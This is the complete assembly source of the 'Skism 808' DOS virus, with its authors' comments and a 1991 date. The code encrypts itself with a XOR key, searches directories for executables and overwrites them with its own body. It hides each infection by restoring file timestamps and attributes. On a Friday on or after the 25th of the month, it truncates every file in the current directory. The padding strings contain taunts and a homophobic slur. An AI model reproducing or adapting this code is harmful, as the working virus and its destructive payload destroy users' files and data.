;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS. FILENAME equ 30 ;USED TO FIND FILE NAME FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES FILEDATE equ 24 ;USED TO FIND FILE DATE FILETIME equ 22 ;USED TO FIND FILE TIME CODE_START equ 0100H ;START OF ALL .com FILES VIRUS_SIZE equ 808 ;tr 808 CODE SEGMENT 'CODE' ASSUME CS:CODE,DS:CODE,ES:CODE ORG CODE_START MAIN PROC NEAR JMP VIRUS_START ENCRYPT_VAL DB 00H VIRUS_START: CALL ENCRYPT ;ENCRYPT/DECRYPT FILE JMP VIRUS ;GO TO START OF CODE ENCRYPT: PUSH CX MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA XOR_LOOP: MOV CH,[BX] ;READ CURRENT BYTE XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY MOV [BX],CH ;SWITCH BYTES INC BX ;MOVE BX UP A BYTE CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE ;ARE WE DONE WITH THE ENCRYPTION JLE XOR_LOOP ;NO? KEEP GOING POP CX RET INFECTFILE: MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY MOV BX,HANDLE ;LOAD BX WITH HANDLE PUSH BX ;SAVE HANDLE ON STACK CALL ENCRYPT ;ENCRYPT FILE POP BX ;GET BACK BX MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE MOV AH,40H ;WRITE TO FILE INT 21H ; PUSH BX CALL ENCRYPT ;FIX UP THE MESS POP BX RET VIRUS_CODE: WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT FILESPEC2 DB "*.*",0 ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta FILEDATA DB 43 DUP (?) ;HOLDS FILES dta DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET TEMPOFS DW ? ;HOLDS OFFSET TEMPSEG DW ? ;HOLDS SEGMENT DRIVECODE DB ? ;HOLDS DRIVE CODE CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS HANDLE DW ? ;HOLDS FILE HANDLE ORIG_TIME DW ? ;HOLDS FILE TIME ORIG_DATE DW ? ;HOLDS FILE DATE ORIG_ATTR DW ? ;HOLDS FILE ATTR IDBUFFER DW 2 DUP (?) ;HOLDS VIRUS ID VIRUS: MOV AX,3000H ;GET DOS VERSION INT 21H ; CMP AL,02H ;IS IT AT LEAST 2.00? JB BUS1 ;WON'T INFECT LESS THAN 2.00 MOV AH,2CH ;GET TIME INT 21H ; MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO ;THERES 100 MUTATIONS POSSIBLE SETDTA: MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA MOV AH,1AH ;SET DTA ADDRESS INT 21H ; NEWDIR: MOV AH,19H ;GET DRIVE CODE INT 21H ; MOV DL,AL ;SAVE DRIVECODE INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER MOV AH,47H ;GET CURRENT DIRECTORY MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN INT 21H ; MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY MOV AH,3BH ;CHANGE DIRECTORY TO ROOT INT 21H ; SCANDIRS: MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS MOV DX, OFFSET WILDCARDS ;LOOK FOR '*' MOV AH,4EH ;FIND FIRST FILE INT 21H ; CMP AX,12H ;NO FIRST FILE? JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT BUS1: JMP BUS DIRLOOP: MOV AH,4FH ;FIND NEXT FILE INT 21H ; CMP AX,12H JE BUS ;NO MORE DIRS FOUND, ROLL OUT CHDIR: MOV DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME MOV AH,3BH ;CHANGE DIRECTORY INT 21H ; MOV AH,2FH ;GET CURRENT DTA ADDRESS INT 21H ; MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA MOV AH,1AH ;SET DTA ADDRESS INT 21H ; SCANDIR: MOV CX,07H ;FIND ANY ATTRIBUTE MOV DX,OFFSET FILESPEC ;POINT DX TO "*.com",0 MOV AH,4EH ;FIND FIRST FILE FUNCTION INT 21H ; CMP AX,12H ;WAS FILE FOUND? JNE TRANSFORM NEXTEXE: MOV AH,4FH ;FIND NEXT FILE INT 21H ; CMP AX,12H ;NONE FOUND JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY MOV AH,3BH ;CHANGE DIRECTORY TO ROOT INT 21H ; MOV AH,1AH ;SET DTA ADDRESS MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET INT 21H ; JMP DIRLOOP BUS: JMP ROLLOUT TRANSFORM: MOV AH,2FH ;TEMPORALLY STORE DTA INT 21H ; MOV [TEMPSEG],ES ;SAVE OLD SEGMENT MOV [TEMPOFS],BX ;SAVE OLD OFFSET MOV DX, OFFSET FILEDATA + FILENAME MOV BX,OFFSET FILEDATA ;SAVE FILE... MOV AX,[BX]+FILEDATE ;DATE MOV ORIG_DATE,AX ; MOV AX,[BX]+FILETIME ;TIME MOV ORIG_TIME,AX ; AND MOV AX,[BX]+FILEATTR ; MOV AX,4300H INT 21H MOV ORIG_ATTR,CX MOV AX,4301H ;CHANGE ATTRIBUTES XOR CX,CX ;CLEAR ATTRIBUTES INT 21H ; MOV AX,3D00H ;OPEN FILE - READ INT 21H ; JC FIXUP ;ERROR - FIND ANOTHER FILE MOV HANDLE,AX ;SAVE HANDLE MOV AH,3FH ;READ FROM FILE MOV BX,HANDLE ;MOVE HANDLE TO BX MOV CX,02H ;READ 2 BYTES MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER INT 21H ; MOV AH,3EH ;CLOSE FILE FOR NOW MOV BX,HANDLE ;LOAD BX WITH HANDLE INT 21H ; MOV BX, IDBUFFER ;FILL BX WITH ID STRING CMP BX,02EBH ;INFECTED? JNE DOIT ;SAME - FIND ANOTHER FILE FIXUP: MOV AH,1AH ;SET DTA ADDRESS MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET INT 21H ; JMP NEXTEXE DOIT: MOV DX, OFFSET FILEDATA + FILENAME MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS INT 21H ; MOV HANDLE,AX ;SAVE HANDLE CALL INFECTFILE ;MOV AX,3EH ;CLOSE FILE ;INT 21H ROLLOUT: MOV AX,5701H ;RESTORE ORIGINAL MOV BX,HANDLE ; MOV CX,ORIG_TIME ;TIME AND MOV DX,ORIG_DATE ;DATE INT 21H ; MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES MOV CX,ORIG_ATTR MOV DX,OFFSET FILEDATA + FILENAME INT 21H ;MOV BX,HANDLE ;MOV AX,3EH ;CLOSE FILE ;INT 21H MOV AH,3BH ;TRY TO FIX THIS MOV DX,OFFSET ROOTDIR ;FOR SPEED INT 21H ; MOV AH,3BH ;CHANGE DIRECTORY MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL INT 21H ; MOV AH,2AH ;CHECK SYSTEM DATE INT 21H ; CMP CX,1991 ;IS IT AT LEAST 1991? JB AUDI ;NO? DON'T DO IT NOW CMP DL,25 ;IS IT THE 25TH? JB AUDI ;NOT YET? QUIT CMP AL,5 ;IS fRIDAY? JNE AUDI ;NO? QUIT MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA MOV AH,1AH ;SET DTA ADDRESS INT 21H ; MOV AH,4EH ;FIND FIRST FILE MOV CX,7H ; MOV DX,OFFSET FILESPEC2 ;OFFSET *.* lOOPS: INT 21H ; JC AUDI ;ERROR? THEN QUIT MOV AX,4301H ;FIND ALL NORMAL FILES XOR CX,CX ; INT 21H ; MOV DX,OFFSET DIRDATA + FILENAME MOV AH,3CH ;FUCK UP ALL FILES IN CURRENT DIR INT 21H ; JC AUDI ;ERROR? QUIT MOV AH,4FH ;FIND NEXT FILE JMP LOOPS ; AUDI: MOV AX,4C00H ;END PROGRAM INT 21H ; ;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T ;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION. WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0 WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0 WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0 WORDS4 DB " yOU SISSYS.....",0 MAIN ENDP CODE ENDS END MAIN